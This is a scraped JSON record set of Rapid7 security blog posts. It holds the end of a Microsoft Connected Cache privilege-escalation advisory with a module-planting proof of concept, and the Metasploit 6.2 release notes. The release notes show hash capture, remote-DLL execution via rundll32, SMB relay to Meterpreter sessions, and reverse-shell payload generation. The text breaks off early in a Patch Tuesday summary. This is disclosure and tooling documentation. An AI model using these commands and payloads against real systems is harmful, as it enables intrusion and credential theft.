BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Users:(I)(RX)\n \n Successfully processed 3 files; Failed processing 0 files\n \n\nThe Powershell scripts are executed every 60 seconds by the Task Scheduler as `NT AUTHORITY\\SYSTEM`. All that is fine. The following part is where trouble begins. This is how `SetDrivesToHealthy.ps1` starts:\n \n \n try\n { \n import-module 'webAdministration'\n \n $error.clear() \n \n\nWhen `SetDrivesToHealthy.ps1` executes, it attempts to load the `webAdministration` module. Before searching the normal %PSModulePath% path, `SetDrivesToHealthy.ps1` looks for the import in `C:\\Doinc\\Product\\Install\\Tasks\\WindowsPowerShell\\Modules\\webAdministration\\`. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to `C:\\Doinc\\Product\\Install\\Tasks\\`:\n \n \n C:\\Doinc\\Product\\Install>icacls ./Tasks/\n ./Tasks/ NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n NT AUTHORITY\\NETWORK SERVICE:(I)(OI)(CI)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(F)\n BUILTIN\\Users:(I)(OI)(CI)(RX)\n BUILTIN\\Users:(I)(CI)(AD)\n BUILTIN\\Users:(I)(CI)(WD)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n \n\nAn attacker can create the necessary directory structure and place their own `webAdministration` so that `SetDrivesToHealthy.ps1` will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file `C:\\r7`.\n \n \n C:\\Doinc\\Product\\Install\\Tasks>dir C:\\\n Volume in drive C has no label.\n Volume Serial Number is 3073-81A6\n \n Directory of C:\\\n \n 01/04/2022 05:01 PM <DIR> Doinc\n 01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294\n 01/04/2022 03:48 PM <DIR> inetpub\n 07/07/2021 04:05 AM <DIR> PerfLogs\n 01/05/2022 09:29 AM <DIR> Program Files\n 01/05/2022 09:29 AM <DIR> Program Files (x86)\n 01/05/2022 09:16 AM <DIR> SCCMContentLib\n 01/05/2022 09:15 AM <DIR> SMSPKGC$\n 01/05/2022 09:17 AM <DIR> SMSSIG$\n 01/05/2022 09:17 AM <DIR> SMS_DP$\n 01/04/2022 05:04 PM <DIR> Users\n 01/04/2022 03:48 PM <DIR> Windows\n 0 File(s) 0 bytes\n 12 Dir(s) 239,837,327,360 bytes free\n \n C:\\Doinc\\Product\\Install\\Tasks>mkdir WindowsPowerShell\n \n C:\\Doinc\\Product\\Install\\Tasks>mkdir WindowsPowerShell\\Modules\\\n \n C:\\Doinc\\Product\\Install\\Tasks>mkdir WindowsPowerShell\\Modules\\webAdministration\\\n \n C:\\Doinc\\Product\\Install\\Tasks>echo New-Item C:\\r7.txt > WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1\n \n C:\\Doinc\\Product\\Install\\Tasks>dir C:\\\n Volume in drive C has no label.\n Volume Serial Number is 3073-81A6\n \n Directory of C:\\\n \n 01/04/2022 05:01 PM <DIR> Doinc\n 01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294\n 01/04/2022 03:48 PM <DIR> inetpub\n 01/05/2022 01:49 PM 0 r7.txt\n 07/07/2021 04:05 AM <DIR> PerfLogs\n 01/05/2022 09:29 AM <DIR> Program Files\n 01/05/2022 09:29 AM <DIR> Program Files (x86)\n 01/05/2022 09:16 AM <DIR> SCCMContentLib\n 01/05/2022 09:15 AM <DIR> SMSPKGC$\n 01/05/2022 09:17 AM <DIR> SMSSIG$\n 01/05/2022 09:17 AM <DIR> SMS_DP$\n 01/04/2022 05:04 PM <DIR> Users\n 01/04/2022 03:48 PM <DIR> Windows\n 1 File(s) 0 bytes\n 12 Dir(s) 239,836,917,760 bytes free\n \n C:\\Doinc\\Product\\Install\\Tasks>icacls C:\\r7.txt\n C:\\lol.txt NT AUTHORITY\\SYSTEM:(I)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Users:(I)(RX)\n \n Successfully processed 1 files; Failed processing 0 files\n \n C:\\Doinc\\Product\\Install\\Tasks>\n \n\nAs you can see, the `C:\\r7.txt` file is created, demonstrating the privilege escalation.\n\n## Remediation\n\nFollow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.\n\n## Disclosure timeline\n\n**January 5, 2022:** Issue disclosed to the vendor \n**January 5, 2022:** Vendor acknowledgement \n**January 6, 2022:** Vendor assigns a case identifier \n**January 10-11, 2022:** Vendor and researcher discuss clarifying details \n**January 19, 2022:** Vendor confirms the vulnerability \n**February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment \n**April 12, 2022:** Public disclosure (this document)\n\n_**Additional reading:**_\n\n * _[CVE-2022-1026: Kyocera Net View Address Book Exposure](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_\n * _[Cloud Pentesting, Pt. 1: Breaking Down the Basics](<https://www.rapid7.com/blog/post/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/>)_\n * _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)](<https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-04-12T17:15:25", "type": "rapid7blog", "title": "CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4191", "CVE-2022-1026", "CVE-2022-24527"], "modified": "2022-04-12T17:15:25", "id": "RAPID7BLOG:33D4097CDEE31272C934831DA3040995", "href": "https://blog.rapid7.com/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T21:29:45", "description": "\n\nFrom Defender to Windows, Office to Azure, this month\u2019s Patch Tuesday has a large swath of Microsoft\u2019s portfolio getting vulnerabilities fixed. 119 CVEs [were addressed today](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>), not including the 26 Chromium vulnerabilities that were fixed in the Edge browser.\n\nOne of these has been observed being exploited in the wild: [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), reported to Microsoft by the National Security Agency, affects the Common Log File System Driver in all supported versions of Windows and allows attackers to gain additional privileges on a system they already have local access to. Another local privilege escalation (LPE), [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>) affecting the Windows User Profile Service, had been publicly disclosed but not reported as already being exploited \u2013 it\u2019s harder for attackers to leverage as it relies on winning a race condition, which can be tricky to reliably achieve.\n\nLPEs don\u2019t always get the same attention that remote code execution (RCE) vulnerabilities do, but they can be a great help to attackers after they gain an initial foothold. These two categories dominate this month\u2019s vulnerabilities, with 55 LPEs and 47 RCEs getting patched. 10 of the RCEs are considered \u201cCritical,\u201d affecting Windows Hyper-V ([CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>), [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>), 